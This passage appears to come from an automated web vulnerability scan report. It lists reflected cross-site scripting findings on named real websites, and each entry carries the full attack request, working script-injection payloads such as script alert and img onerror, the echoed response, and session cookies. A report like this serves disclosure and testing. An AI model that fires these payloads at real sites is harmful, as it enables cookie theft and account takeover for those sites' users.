GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL54774\'%3balert(1)//0f6ddc84b8a&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:27:13 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
users_form','FE[fe_users][title]','3');
   updateForm('fe_users_form','FE[fe_users][zip]','3');
   updateForm('fe_users_form','FE[fe_users][city]','3');
   updateForm('fe_users_form','FE[fe_users][zone]','AL54774\\';alert(1)//0f6ddc84b8a');
   updateForm('fe_users_form','FE[fe_users][static_info_country]','AFG');
   updateForm('fe_users_form','FE[fe_users][country]','');
   updateForm('fe_users_form','FE[fe_users][language]','');
   updateFor
...[SNIP]...

4.184. http://www.reed-elsevier.com/Telerik.Web.UI.WebResource.axd [_TSM_CombinedScripts_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reed-elsevier.com
Path:   /Telerik.Web.UI.WebResource.axd

Issue detail

The value of the _TSM_CombinedScripts_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35375"-alert(1)-"dda4f53d366 was submitted in the _TSM_CombinedScripts_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Telerik.Web.UI.WebResource.axd?_TSM_HiddenField_=ctl00_ScriptManager_HiddenField&compress=1&_TSM_CombinedScripts_=%3b%3bSystem.Web.Extensions%2c+Version%3d3.5.0.0%2c+Culture%3dneutral%2c+PublicKeyToken%3d31bf3856ad364e35%3aen-US%3a94b8a2b4-5efc-4f4c-9641-d912b698978d%3aea597d4b%3ab25378d2%3bTelerik.Web.UI%2c+Version%3d2009.3.1103.35%2c+Culture%3dneutral%2c+PublicKeyToken%3d121fae78165ba3d4%3aen-US%3a4552b812-caf7-4129-9b53-8f199b5bce6c%3a16e4e7cd%3af7645509%3a24ee1bba%3ae330518b%3a1e771326%3a8e6f0d33%3a6a6d718d%3ac8618e4135375"-alert(1)-"dda4f53d366 HTTP/1.1
Host: www.reed-elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=18399930.1302905572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18399930.407322604.1302905572.1302905572.1302961730.2; __utmc=18399930; __utmb=18399930.2.10.1302961730; ebNewBandWidth_.www.reed-elsevier.com=1930%3A1302905571919;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 14:15:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6315
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Sun, 15 Apr 2012 14:15:06 GMT
Last-Modified: Thu, 11 Feb 2010 14:43:21 GMT
Vary: Accept-Encoding, User-Agent
Content-Type: application/x-javascript
Content-Length: 311021

/* START MicrosoftAjax.js */
//----------------------------------------------------------
// Copyright (C) Microsoft Corporation. All rights reserved.
//--------------------------------------------
...[SNIP]...
ultiPageScripts.js */
/* START */
/* ERROR: Unable to load script from assembly 'Telerik.Web.UI, Version=2009.3.1103.35, Culture=neutral, PublicKeyToken=121fae78165ba3d4', script name hash 'c8618e4135375"-alert(1)-"dda4f53d366' */
/* END */
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {if(!$get('ctl00_ScriptManager_HiddenField')) return; $get('ctl00_ScriptManager_Hi
...[SNIP]...

4.185. http://www.staysafeonline.org/emvideo/modal/975/425/350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.staysafeonline.org
Path:   /emvideo/modal/975/425/350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b97eb"><img%20src%3da%20onerror%3dalert(1)>f6a4e450b1c was submitted in the REST URL parameter 4. This input was echoed as b97eb"><img src=a onerror=alert(1)>f6a4e450b1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /emvideo/modal/975/425b97eb"><img%20src%3da%20onerror%3dalert(1)>f6a4e450b1c/350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639 HTTP/1.1
Host: www.staysafeonline.org
Proxy-Connection: keep-alive
Referer: http://www.staysafeonline.org/tools-resources/staysafeonline-videos
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.12.9.1303044859548

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:00:39 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 17 Apr 2011 13:00:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 2506
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<embed src="/custom-video/1-15-high.mp4" width="425b97eb"><img src=a onerror=alert(1)>f6a4e450b1c" height="350" autoplay="true" controller="true" type="video/quicktime" scale="tofit" pluginspage="http://www.apple.com/quicktime/download/">
...[SNIP]...

4.186. http://www.staysafeonline.org/emvideo/modal/975/425/350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.staysafeonline.org
Path:   /emvideo/modal/975/425/350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e90ef"><img%20src%3da%20onerror%3dalert(1)>ff5fd031a2b was submitted in the REST URL parameter 5. This input was echoed as e90ef"><img src=a onerror=alert(1)>ff5fd031a2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /emvideo/modal/975/425/350e90ef"><img%20src%3da%20onerror%3dalert(1)>ff5fd031a2b/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639 HTTP/1.1
Host: www.staysafeonline.org
Proxy-Connection: keep-alive
Referer: http://www.staysafeonline.org/tools-resources/staysafeonline-videos
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.12.9.1303044859548

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:00:49 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 17 Apr 2011 13:00:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 2506
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<embed src="/custom-video/1-15-high.mp4" width="425" height="350e90ef"><img src=a onerror=alert(1)>ff5fd031a2b" autoplay="true" controller="true" type="video/quicktime" scale="tofit" pluginspage="http://www.apple.com/quicktime/download/">
...[SNIP]...

4.187. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /certified-inventory/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34888"><script>alert(1)</script>721f99e013c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /certified-inventory34888"><script>alert(1)</script>721f99e013c/index.htm?reset=InventoryListing HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.3.8.1302976680881

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14378
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:58:44 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/certified-inventory34888"><script>alert(1)</script>721f99e013c/index.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...

4.188. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm [SBbodystyle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /certified-inventory/index.htm

Issue detail

The value of the SBbodystyle request parameter is copied into the HTML document as plain text between tags. The payload 5c46c<script>alert(1)</script>0f97ee897e7 was submitted in the SBbodystyle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /certified-inventory/index.htm?SByear=clear&SBmake=BMW&SBmodel=clear&SBbodystyle=clear5c46c<script>alert(1)</script>0f97ee897e7&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/certified-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.5.8.1302976687612

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:58:17 GMT
Connection: close
Cache-Control: no-store
Content-Length: 36775

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Certified preowned vehicles: buy a used car, truck, SUV, automobile</title>
   <meta http-e
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no BMW clear5c46c<script>alert(1)</script>0f97ee897e7 Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...

4.189. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm [SBmake parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /certified-inventory/index.htm

Issue detail

The value of the SBmake request parameter is copied into the HTML document as plain text between tags. The payload 1bd3e<script>alert(1)</script>56a64775370 was submitted in the SBmake parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /certified-inventory/index.htm?SByear=clear&SBmake=BMW1bd3e<script>alert(1)</script>56a64775370&SBmodel=clear&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/certified-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.5.8.1302976687612

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:58:07 GMT
Connection: close
Cache-Control: no-store
Content-Length: 36649

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Certified preowned vehicles: buy a used car, truck, SUV, automobile</title>
   <meta http-e
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no BMW1bd3e<script>alert(1)</script>56a64775370 Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...

4.190. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm [SBmodel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /certified-inventory/index.htm

Issue detail

The value of the SBmodel request parameter is copied into the HTML document as plain text between tags. The payload 24ae3<script>alert(1)</script>9446c4033ba was submitted in the SBmodel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /certified-inventory/index.htm?SByear=clear&SBmake=BMW&SBmodel=clear24ae3<script>alert(1)</script>9446c4033ba&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/certified-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.5.8.1302976687612

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:58:12 GMT
Connection: close
Cache-Control: no-store
Content-Length: 36832

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Certified preowned vehicles: buy a used car, truck, SUV, automobile</title>
   <meta http-e
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no BMW clear24ae3<script>alert(1)</script>9446c4033ba Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...

4.191. http://www.theautomastermercedesbenz.com/dealership/about.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /dealership/about.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adac1"><script>alert(1)</script>b126d4f3216 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dealershipadac1"><script>alert(1)</script>b126d4f3216/about.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.30.7.1302974169538

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14369
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:16:39 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/dealershipadac1"><script>alert(1)</script>b126d4f3216/about.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...

4.192. http://www.theautomastermercedesbenz.com/financing/index.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /financing/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ad6"><script>alert(1)</script>1eed9a4dd1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /financingb7ad6"><script>alert(1)</script>1eed9a4dd1b/index.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f439ee10a0a002f005f07e8e85727f2; JSESSIONID=cywj1cs5gwvm; ddcpoolid=CmsPoolO; __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.5.6.1302973388995

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14278
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:05:52 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://theautomaster.com/index.htm&amp;20=www.theautomastermercedesbenz.com&amp;21=/financingb7ad6"><script>alert(1)</script>1eed9a4dd1b/index.htm&amp;50=5f439ee10a0a002f005f07e8e85727f2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...

4.193. http://www.theautomastermercedesbenz.com/linkout/index.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /linkout/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6bc8"><script>alert(1)</script>504fe4ad92d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /linkoutc6bc8"><script>alert(1)</script>504fe4ad92d/index.htm?url=http://www.dealer.com HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.26.9.1302973849681

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14366
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:11:28 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
